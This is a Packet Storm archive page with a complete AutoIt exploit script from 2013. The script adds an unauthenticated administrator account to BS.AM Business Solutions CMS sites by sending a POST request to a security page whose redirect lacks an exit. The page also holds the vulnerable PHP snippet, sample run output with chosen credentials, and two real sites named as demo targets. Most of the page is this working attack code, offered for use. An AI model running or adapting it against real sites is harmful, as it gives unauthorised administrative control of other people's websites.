exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Business Solutions CMS Add Admin

Business Solutions CMS Add Admin
Posted Jan 10, 2013
Authored by Akastep

Business Solutions CMS add administrator exploit that does not require authentication.

tags | exploit
SHA-256 | fa6b20834c1535c6a89139a7f3194efde7fe3bb133b1ffaf7e80a747ce527856

Business Solutions CMS Add Admin

Change Mirror Download
#cs
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm AkaStep member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

bs_am_remote_add_admin.au3


BS.AM (BUSINESS SOLUTIONS) CMS REMOTE ADD ADMIN EXPLOIT.
THIS IS A EXPLOIT WRITTEN IN AUTOIT SCRIPTING/PROGRAMMING LANGUAGE.
ON SUCCESSFULL REMOTE EXPLOITATION IT WILL NEW ADMIN TO TARGET SITE.

***** THIS IS A WHOLE EXPLOIT! *****
THANK YOU!

FEW DEMOS:

http://asba.am
http://doors.am



DEMO USAGE:

>poc.exe http://asba.am bigbang bigbang


##############################################################
(BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8)
Usage: poc.exe http://site.tld username password
[*] DON'T HATE FROM HACKER, HATE YOUR OWN CODE! [*]
[@@@] Vuln & Exploit By AkaStep [@@@]
##############################################################
[+] GETTING INFO ABOUT CMS [+]
[*] GOT Response : Yes! It is exactly that we are looking for! [*]

##################################################
Trying to add new admin:
To Site:www.asba.am
With Username: bigbang
With Password: bigbang
##################################################

##################################################
Exploit Try Count:1
##################################################
Error Count: 0
##################################################

##################################################
Exploit Try Count:2
##################################################
Error Count: 0
##################################################
Count of errors during exploitation : 0

##################################################
[*] Seems we are going to travel xD. [*]
Try to login @
Site: asba.am/cms/index.php
With Username: bigbang
With Password: bigbang
##################################################
[*] Exit [*]
##################################################








VULNERABLE CODE:
NOTICE script continues it's execution.Because missing exit; after header();
FUNNY TO SEE HOW MANY PROGRAMMERS FAILS TO UNDERSTAND THIS;)

//cms/admin.php

============SNIP BEGINS============
<?
session_start();
if ($_SESSION['login11_error'] != "no")
header("Location: index.php");
include 'config.php';?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>cms::</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="css/main.css" />
<script type="text/javascript" src="javascript/jquery-1.4.2.js"></script>

<script type="text/javascript" src="javascript/admin.js"></script>
<script type="text/javascript" src="javascript/jquery-ui-1.8.11.custom.min.js"></script>
<script type="text/javascript" src="javascript/jquery.ui.datepicker-hy.js"></script>

<script type="text/javascript" src="javascript/jquery.lightbox-0.5.js"></script>
<link type="text/css" href="css/jquery-ui-1.8.11.custom.css" rel="stylesheet" />
</head>
<body>
<div id="header">

============SNIP ENDS HERE===========



#ce
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#NoTrayIcon
#include "WinHttp.au3"
#include <inet.au3>
#include <String.au3>

$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
'(BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF & _
'Usage: ' & @ScriptName & ' http://site.tld ' & ' username ' & 'password ' & _
@CRLF & "[*] DON'T HATE FROM HACKER, HATE YOUR OWN CODE! [*]" & @CRLF & _
'[@@@] Vuln & Exploit By AkaStep [@@@]' & @CRLF & _StringRepeat('#',62);
ConsoleWrite(@CRLF & $exploitname & @CRLF)

$method='POST';
$vulnurl='cms/admin.php?lang=en&page=security';
Global $count=0,$error=0;
$cmsindent='CaptchaSecurityImages.php';
$adminpanel='/cms/index.php';

if $CmdLine[0] <> 3 Then
MsgBox(64,"","Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://www.site.tld ' & ' username ' & 'password' & @CRLF);
exit;
EndIf


if $CmdLine[0]=3 Then
$targetsite=$CmdLine[1];
$username=$CmdLine[2];
$password=$CmdLine[3];
EndIf



if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then
ConsoleWrite('Are you kidding me?');
Exit;
EndIf



$doublecheck=InetGet($targetsite,'',1);
if @error Then
ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)
Exit;
EndIf


ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);
sleep(Random(1200,2500,1));




$sidentify=_INetGetSource($targetsite & $adminpanel,True);




if StringInStr($sidentify,$cmsindent) Then
ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)
Else
ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)
$error+=1;
EndIf




$targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','')


priv8($targetsite,$username,$password,$count,$error);#~ do magic for me plizzz));~#

Func priv8($targetsite,$username,$password,$count,$error)


$count+=1;


Global $sAddress = $targetsite

$triptrop=@CRLF & _StringRepeat('#',50) & @CRLF;
$whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF & 'To Site:' & $targetsite & @CRLF & 'With Username: ' & _
$username & @CRLF & 'With Password: ' & $password & $triptrop;
if $count <=1 then ConsoleWrite($whatcurrentlywedo)

$doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count: ' & $error & $triptrop;
ConsoleWrite($doitnicely);
Global $sPostData = "username=" & $username & "&password=" & $password & "&rewrite_password=" & $password & "&ifsubmit=yes";


if $error>=2 OR $count>=2 Then
ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)

if int($error)=0 then
ConsoleWrite($triptrop & '[*] Seems we are going to travel xD. [*]' & _
@CRLF & 'Try to login @ ' & @CRLF & _
'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: ' & _
$username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop);
exit;
Else

ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed? [*]' & @CRLF & _
'[*] Anyway,try to login with new credentials. [*]' & @CRLF & _
'[*] May be you are Lucky;) [*]' & _
@CRLF & 'Try to login @ ' & @CRLF & _
'Site: ' & $targetsite & $adminpanel & @CRLF & _
'With Username: ' & $username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop);

EndIf
exit;

EndIf



Global $hOpen = _WinHttpOpen("Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325)");


Global $hConnect = _WinHttpConnect($hOpen, $sAddress)


Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,'');







_WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-us,en;q=0.5")
_WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
_WinHttpAddRequestHeaders($hRequest, "DNT: 1")
_WinHttpAddRequestHeaders($hRequest, "Keep-Alive: 300")
_WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
_WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")
_WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData));






_WinHttpSendRequest($hRequest, -1, $sPostData)

_WinHttpReceiveResponse($hRequest)

Global $sHeader, $sReturned
If _WinHttpQueryDataAvailable($hRequest) Then
$sHeader = _WinHttpQueryHeaders($hRequest)
Do
$sReturned &= _WinHttpReadData($hRequest)
Until @error

_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)

$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(1500);
priv8($targetsite,$username,$password,$count,$error);

Else
$error+=1

_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)

$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(1500);
priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~#

EndIf

EndFunc;=> priv8();


#cs

================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep

#ce
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close